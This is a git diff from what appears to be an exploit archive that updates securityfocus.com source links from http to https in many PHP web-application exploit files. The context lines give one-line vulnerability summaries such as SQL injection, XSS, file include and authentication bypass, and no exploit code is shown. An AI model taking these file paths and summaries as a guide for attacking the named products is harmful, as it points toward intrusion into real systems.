a/exploits/php/webapps/25123.txt b/exploits/php/webapps/25123.txt index 3a0c32f3c..f9f021e81 100644 --- a/exploits/php/webapps/25123.txt +++ b/exploits/php/webapps/25123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12592/info +source: https://www.securityfocus.com/bid/12592/info TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues. diff --git a/exploits/php/webapps/25125.txt b/exploits/php/webapps/25125.txt index 297bd7d25..26382b5f3 100644 --- a/exploits/php/webapps/25125.txt +++ b/exploits/php/webapps/25125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12596/info +source: https://www.securityfocus.com/bid/12596/info ZeroBoard is reported prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25127.txt b/exploits/php/webapps/25127.txt index 130b55d4a..464a24b5f 100644 --- a/exploits/php/webapps/25127.txt +++ b/exploits/php/webapps/25127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12597/info +source: https://www.securityfocus.com/bid/12597/info PMachine Pro is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25143.txt b/exploits/php/webapps/25143.txt index 899d0f473..5b1483d2a 100644 --- a/exploits/php/webapps/25143.txt +++ b/exploits/php/webapps/25143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12607/info +source: https://www.securityfocus.com/bid/12607/info Invision Power Board is reported prone to a JavaScript injection vulnerability. It is reported that the SML Code 'COLOR' tag is not sufficiently sanitized of malicious script content. diff --git a/exploits/php/webapps/25145.txt b/exploits/php/webapps/25145.txt index 28fc7dc56..e5dae63ed 100644 --- a/exploits/php/webapps/25145.txt +++ b/exploits/php/webapps/25145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12611/info +source: https://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. diff --git a/exploits/php/webapps/25149.txt b/exploits/php/webapps/25149.txt index a13cd9630..fe249781d 100644 --- a/exploits/php/webapps/25149.txt +++ b/exploits/php/webapps/25149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12627/info +source: https://www.securityfocus.com/bid/12627/info iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries. diff --git a/exploits/php/webapps/25151.txt b/exploits/php/webapps/25151.txt index e62c4ad66..7a37a150e 100644 --- a/exploits/php/webapps/25151.txt +++ b/exploits/php/webapps/25151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12631/info +source: https://www.securityfocus.com/bid/12631/info PBLang is reportedly affected by a cross-site scripting vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25152.txt b/exploits/php/webapps/25152.txt index c881d5cc6..f8a5229d5 100644 --- a/exploits/php/webapps/25152.txt +++ b/exploits/php/webapps/25152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25153.txt b/exploits/php/webapps/25153.txt index 33a4d8b13..ad867853e 100644 --- a/exploits/php/webapps/25153.txt +++ b/exploits/php/webapps/25153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25154.txt b/exploits/php/webapps/25154.txt index 4cc90cea5..e5cbdb350 100644 --- a/exploits/php/webapps/25154.txt +++ b/exploits/php/webapps/25154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25155.txt b/exploits/php/webapps/25155.txt index b6834b7c5..609547ede 100644 --- a/exploits/php/webapps/25155.txt +++ b/exploits/php/webapps/25155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25156.txt b/exploits/php/webapps/25156.txt index 5eb3ac19d..4ce190a7a 100644 --- a/exploits/php/webapps/25156.txt +++ b/exploits/php/webapps/25156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12645/info +source: https://www.securityfocus.com/bid/12645/info phpMyAdmin is affected by multiple local file include vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()', 'require()', 'require-once()', or similar function call. diff --git a/exploits/php/webapps/25158.txt b/exploits/php/webapps/25158.txt index 800dc7921..04f453e4b 100644 --- a/exploits/php/webapps/25158.txt +++ b/exploits/php/webapps/25158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12647/info +source: https://www.securityfocus.com/bid/12647/info OOApp Guestbook is reportedly affected by multiple HTML injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25160.txt b/exploits/php/webapps/25160.txt index 13a4538f4..8b1dba5b6 100644 --- a/exploits/php/webapps/25160.txt +++ b/exploits/php/webapps/25160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12652/info +source: https://www.securityfocus.com/bid/12652/info Multiple remote input validation vulnerabilities affect PunBB. These issues are due to a failure of the application to sanitize user-supplied input prior to using it to carry out critical functions. diff --git a/exploits/php/webapps/25161.txt b/exploits/php/webapps/25161.txt index 1ec688d4e..c14c652ad 100644 --- a/exploits/php/webapps/25161.txt +++ b/exploits/php/webapps/25161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12653/info +source: https://www.securityfocus.com/bid/12653/info phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement. diff --git a/exploits/php/webapps/25162.txt b/exploits/php/webapps/25162.txt index c48ebe315..a15db8b70 100644 --- a/exploits/php/webapps/25162.txt +++ b/exploits/php/webapps/25162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12658/info +source: https://www.securityfocus.com/bid/12658/info CubeCart is affected by multiple cross-site scripting vulnerabilities; an upgrade is available. diff --git a/exploits/php/webapps/25168.c b/exploits/php/webapps/25168.c index 8d0d2f88c..557dde3c9 100644 --- a/exploits/php/webapps/25168.c +++ b/exploits/php/webapps/25168.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +// source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25169.pl b/exploits/php/webapps/25169.pl index 6c1d06654..03c5079c3 100755 --- a/exploits/php/webapps/25169.pl +++ b/exploits/php/webapps/25169.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25170.cpp b/exploits/php/webapps/25170.cpp index 592d92a7c..97d52d896 100644 --- a/exploits/php/webapps/25170.cpp +++ b/exploits/php/webapps/25170.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25172.txt b/exploits/php/webapps/25172.txt index 63f408bae..45bca4e70 100644 --- a/exploits/php/webapps/25172.txt +++ b/exploits/php/webapps/25172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12683/info +source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25173.txt b/exploits/php/webapps/25173.txt index ed365b4ab..ae06f45a0 100644 --- a/exploits/php/webapps/25173.txt +++ b/exploits/php/webapps/25173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12684/info +source: https://www.securityfocus.com/bid/12684/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25174.txt b/exploits/php/webapps/25174.txt index 460fc56d7..11cfd08d5 100644 --- a/exploits/php/webapps/25174.txt +++ b/exploits/php/webapps/25174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12686/info +source: https://www.securityfocus.com/bid/12686/info Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality. diff --git a/exploits/php/webapps/25175.txt b/exploits/php/webapps/25175.txt index a2a87d5dd..f07826e0f 100644 --- a/exploits/php/webapps/25175.txt +++ b/exploits/php/webapps/25175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12686/info +source: https://www.securityfocus.com/bid/12686/info Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality. diff --git a/exploits/php/webapps/25176.txt b/exploits/php/webapps/25176.txt index 0bd39698e..0ccd326e4 100644 --- a/exploits/php/webapps/25176.txt +++ b/exploits/php/webapps/25176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12690/info +source: https://www.securityfocus.com/bid/12690/info PBLang is reported prone to a directory traversal vulnerability. It is reported that the issue exists due to a lack of sufficient sanitization performed on user-supplied input. diff --git a/exploits/php/webapps/25177.txt b/exploits/php/webapps/25177.txt index 96e2a756f..8a803e8df 100644 --- a/exploits/php/webapps/25177.txt +++ b/exploits/php/webapps/25177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12691/info +source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25178.txt b/exploits/php/webapps/25178.txt index bebf8be13..693c9a4ea 100644 --- a/exploits/php/webapps/25178.txt +++ b/exploits/php/webapps/25178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12693/info +source: https://www.securityfocus.com/bid/12693/info 427BB is reportedly affected by multiple remote HTML injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25179.txt b/exploits/php/webapps/25179.txt index 8d26c8476..687d5982b 100644 --- a/exploits/php/webapps/25179.txt +++ b/exploits/php/webapps/25179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12694/info +source: https://www.securityfocus.com/bid/12694/info PBLang is reported prone to a vulnerability that can allow a registered user to delete arbitrary personal messages. The vulnerability exists due to a design error leading to a lack of access controls. diff --git a/exploits/php/webapps/25180.py b/exploits/php/webapps/25180.py index 9a5d79672..b381cef63 100755 --- a/exploits/php/webapps/25180.py +++ b/exploits/php/webapps/25180.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12696/info +source: https://www.securityfocus.com/bid/12696/info It is reported that PHPNews is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25183.txt b/exploits/php/webapps/25183.txt index 9ccb398e5..0c0cb1779 100644 --- a/exploits/php/webapps/25183.txt +++ b/exploits/php/webapps/25183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12709/info +source: https://www.securityfocus.com/bid/12709/info ProjectBB is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25184.txt b/exploits/php/webapps/25184.txt index 2ce71f9a3..61f471731 100644 --- a/exploits/php/webapps/25184.txt +++ b/exploits/php/webapps/25184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12710/info +source: https://www.securityfocus.com/bid/12710/info ProjectBB is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25185.txt b/exploits/php/webapps/25185.txt index b654e3bfe..ccdd2e8cc 100644 --- a/exploits/php/webapps/25185.txt +++ b/exploits/php/webapps/25185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12720/info +source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25186.txt b/exploits/php/webapps/25186.txt index b379e7129..862f02752 100644 --- a/exploits/php/webapps/25186.txt +++ b/exploits/php/webapps/25186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12721/info +source: https://www.securityfocus.com/bid/12721/info Typo3 'cmw_linklist' extension is affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/php/webapps/25189.txt b/exploits/php/webapps/25189.txt index f8b0ecb07..eca282ce7 100644 --- a/exploits/php/webapps/25189.txt +++ b/exploits/php/webapps/25189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12726/info +source: https://www.securityfocus.com/bid/12726/info Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25192.pl b/exploits/php/webapps/25192.pl index 63941b606..053606cd2 100755 --- a/exploits/php/webapps/25192.pl +++ b/exploits/php/webapps/25192.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12735/info +source: https://www.securityfocus.com/bid/12735/info PHP Form Mail Script is prone to remote file include vulnerability. diff --git a/exploits/php/webapps/25193.txt b/exploits/php/webapps/25193.txt index 897759600..95500a940 100644 --- a/exploits/php/webapps/25193.txt +++ b/exploits/php/webapps/25193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12747/info +source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include_once()' function call. diff --git a/exploits/php/webapps/25197.txt b/exploits/php/webapps/25197.txt index 1ff88bed8..9dbe388fd 100644 --- a/exploits/php/webapps/25197.txt +++ b/exploits/php/webapps/25197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12751/info +source: https://www.securityfocus.com/bid/12751/info PHP-Fusion is reported prone to a script injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input prior to including it in dynamically generated content. diff --git a/exploits/php/webapps/25199.txt b/exploits/php/webapps/25199.txt index 9be0c5e2e..6c0cf0b1e 100644 --- a/exploits/php/webapps/25199.txt +++ b/exploits/php/webapps/25199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12756/info +source: https://www.securityfocus.com/bid/12756/info A remote cross-site scripting vulnerability affects YaBB. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25200.txt b/exploits/php/webapps/25200.txt index 93d0f6764..0a7c3bfec 100644 --- a/exploits/php/webapps/25200.txt +++ b/exploits/php/webapps/25200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12758/info +source: https://www.securityfocus.com/bid/12758/info Multiple remote cross-site scripting vulnerabilities affect PHP Arena PaFileDB. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25206.txt b/exploits/php/webapps/25206.txt index dcad05c25..54ecc56ac 100644 --- a/exploits/php/webapps/25206.txt +++ b/exploits/php/webapps/25206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12777/info +source: https://www.securityfocus.com/bid/12777/info Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution. diff --git a/exploits/php/webapps/25208.txt b/exploits/php/webapps/25208.txt index 3cea88321..cdf336340 100644 --- a/exploits/php/webapps/25208.txt +++ b/exploits/php/webapps/25208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12779/info +source: https://www.securityfocus.com/bid/12779/info PhotoPost PHP Pro is a web-based image gallery application written in PHP. It can be implemented on any platform that supports PHP script execution. diff --git a/exploits/php/webapps/25212.txt b/exploits/php/webapps/25212.txt index ce7313b8b..f8c924f2e 100644 --- a/exploits/php/webapps/25212.txt +++ b/exploits/php/webapps/25212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12784/info +source: https://www.securityfocus.com/bid/12784/info It is reported that UBB.threads is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25213.txt b/exploits/php/webapps/25213.txt index f16ebfb3c..9626475a4 100644 --- a/exploits/php/webapps/25213.txt +++ b/exploits/php/webapps/25213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25214.txt b/exploits/php/webapps/25214.txt index 7d99e9c8f..55bd4cf94 100644 --- a/exploits/php/webapps/25214.txt +++ b/exploits/php/webapps/25214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25215.txt b/exploits/php/webapps/25215.txt index be36118a0..1fad2f921 100644 --- a/exploits/php/webapps/25215.txt +++ b/exploits/php/webapps/25215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25216.txt b/exploits/php/webapps/25216.txt index deb472c46..e187348af 100644 --- a/exploits/php/webapps/25216.txt +++ b/exploits/php/webapps/25216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25217.html b/exploits/php/webapps/25217.html index 5874a08fa..68702c56f 100644 --- a/exploits/php/webapps/25217.html +++ b/exploits/php/webapps/25217.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12789/info +source: https://www.securityfocus.com/bid/12789/info HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server. This is due an input validation error that allows users to submit voting data to an attacker-specified file. diff --git a/exploits/php/webapps/25220.txt b/exploits/php/webapps/25220.txt index 570269d83..becfc238e 100644 --- a/exploits/php/webapps/25220.txt +++ b/exploits/php/webapps/25220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12796/info +source: https://www.securityfocus.com/bid/12796/info paBox is reportedly affected by a HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25222.html b/exploits/php/webapps/25222.html index 72bcf5af6..515877576 100644 --- a/exploits/php/webapps/25222.html +++ b/exploits/php/webapps/25222.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12799/info +source: https://www.securityfocus.com/bid/12799/info HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server. diff --git a/exploits/php/webapps/25223.txt b/exploits/php/webapps/25223.txt index 0c7d5b1ba..36d948815 100644 --- a/exploits/php/webapps/25223.txt +++ b/exploits/php/webapps/25223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12800/info +source: https://www.securityfocus.com/bid/12800/info Phorum is reportedly affected by multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25224.txt b/exploits/php/webapps/25224.txt index 44ec8d4eb..ea361ab25 100644 --- a/exploits/php/webapps/25224.txt +++ b/exploits/php/webapps/25224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12801/info +source: https://www.securityfocus.com/bid/12801/info SimpGB is reportedly affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'guestbook.php' script before using it in a SQL query. diff --git a/exploits/php/webapps/25225.txt b/exploits/php/webapps/25225.txt index d6342d2d7..e3057fbdb 100644 --- a/exploits/php/webapps/25225.txt +++ b/exploits/php/webapps/25225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12803/info +source: https://www.securityfocus.com/bid/12803/info phpAdsNew is reportedly affected by a remote cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25226.txt b/exploits/php/webapps/25226.txt index 221002618..706e3c833 100644 --- a/exploits/php/webapps/25226.txt +++ b/exploits/php/webapps/25226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12806/info +source: https://www.securityfocus.com/bid/12806/info It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script. diff --git a/exploits/php/webapps/25227.txt b/exploits/php/webapps/25227.txt index 1328a7077..af6d7c73d 100644 --- a/exploits/php/webapps/25227.txt +++ b/exploits/php/webapps/25227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25228.txt b/exploits/php/webapps/25228.txt index 42fdd5aa3..c0a1c2302 100644 --- a/exploits/php/webapps/25228.txt +++ b/exploits/php/webapps/25228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25229.txt b/exploits/php/webapps/25229.txt index 4dd09d26c..2d5d7eaa7 100644 --- a/exploits/php/webapps/25229.txt +++ b/exploits/php/webapps/25229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25230.txt b/exploits/php/webapps/25230.txt index 1db557c26..175eee636 100644 --- a/exploits/php/webapps/25230.txt +++ b/exploits/php/webapps/25230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12828/info +source: https://www.securityfocus.com/bid/12828/info PunBB is reportedly affected by multiple HTML injection vulnerabilities. diff --git a/exploits/php/webapps/25232.txt b/exploits/php/webapps/25232.txt index 9da014794..f3f326ac1 100644 --- a/exploits/php/webapps/25232.txt +++ b/exploits/php/webapps/25232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12835/info +source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. diff --git a/exploits/php/webapps/25235.txt b/exploits/php/webapps/25235.txt index fb479fd4f..212a8f07a 100644 --- a/exploits/php/webapps/25235.txt +++ b/exploits/php/webapps/25235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12839/info +source: https://www.securityfocus.com/bid/12839/info Subdreamer is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25236.html b/exploits/php/webapps/25236.html index 79e0ee4bb..8df89a2fb 100644 --- a/exploits/php/webapps/25236.html +++ b/exploits/php/webapps/25236.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12841/info +source: https://www.securityfocus.com/bid/12841/info PHPOpenChat is reportedly affected by multiple remote HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25237.txt b/exploits/php/webapps/25237.txt index d7640b95e..e47dc21f3 100644 --- a/exploits/php/webapps/25237.txt +++ b/exploits/php/webapps/25237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12848/info +source: https://www.securityfocus.com/bid/12848/info RunCMS is reportedly affected by an information disclosure vulnerability. This issue is due to a failure in the application to secure sensitive information. diff --git a/exploits/php/webapps/25239.txt b/exploits/php/webapps/25239.txt index d529cd6cc..ceb18497f 100644 --- a/exploits/php/webapps/25239.txt +++ b/exploits/php/webapps/25239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12852/info +source: https://www.securityfocus.com/bid/12852/info Multiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25240.txt b/exploits/php/webapps/25240.txt index 1c30d57aa..a4df11fbe 100644 --- a/exploits/php/webapps/25240.txt +++ b/exploits/php/webapps/25240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12852/info +source: https://www.securityfocus.com/bid/12852/info Multiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25241.html b/exploits/php/webapps/25241.html index 77e76873b..e59a00e6a 100644 --- a/exploits/php/webapps/25241.html +++ b/exploits/php/webapps/25241.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12853/info +source: https://www.securityfocus.com/bid/12853/info PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content. diff --git a/exploits/php/webapps/25242.txt b/exploits/php/webapps/25242.txt index 476559bff..961a8fec3 100644 --- a/exploits/php/webapps/25242.txt +++ b/exploits/php/webapps/25242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12854/info +source: https://www.securityfocus.com/bid/12854/info Ciamos is reported prone to a file disclosure vulnerability. The full scope of this vulnerability is not currently known, however, it is demonstrated that this issue may be leveraged to disclose the source of PHP files contained in a Ciamos installation. diff --git a/exploits/php/webapps/25243.txt b/exploits/php/webapps/25243.txt index 72c9d8c34..7b9f2b35c 100644 --- a/exploits/php/webapps/25243.txt +++ b/exploits/php/webapps/25243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12855/info +source: https://www.securityfocus.com/bid/12855/info A remote file include vulnerability affects TRG News. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25244.txt b/exploits/php/webapps/25244.txt index 3cac6144f..152d05c97 100644 --- a/exploits/php/webapps/25244.txt +++ b/exploits/php/webapps/25244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12857/info +source: https://www.securityfocus.com/bid/12857/info CzarNews is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/25257.txt b/exploits/php/webapps/25257.txt index cd879a506..8583c24e7 100644 --- a/exploits/php/webapps/25257.txt +++ b/exploits/php/webapps/25257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12868/info +source: https://www.securityfocus.com/bid/12868/info Kayako ESupport is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25258.txt b/exploits/php/webapps/25258.txt index 2279d8fbb..5303ad866 100644 --- a/exploits/php/webapps/25258.txt +++ b/exploits/php/webapps/25258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12869/info +source: https://www.securityfocus.com/bid/12869/info A remote HTTP response splitting vulnerability reportedly affects Phorum. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25260.txt b/exploits/php/webapps/25260.txt index 7e3d640a5..5bc020573 100644 --- a/exploits/php/webapps/25260.txt +++ b/exploits/php/webapps/25260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12878/info +source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25261.txt b/exploits/php/webapps/25261.txt index 664f885ae..a3badda23 100644 --- a/exploits/php/webapps/25261.txt +++ b/exploits/php/webapps/25261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12878/info +source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25262.txt b/exploits/php/webapps/25262.txt index 08ebf3506..2d5f2bfea 100644 --- a/exploits/php/webapps/25262.txt +++ b/exploits/php/webapps/25262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12879/info +source: https://www.securityfocus.com/bid/12879/info Interspire ArticleLive 2005 is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25263.txt b/exploits/php/webapps/25263.txt index 1ed9f638c..bc2626c9c 100644 --- a/exploits/php/webapps/25263.txt +++ 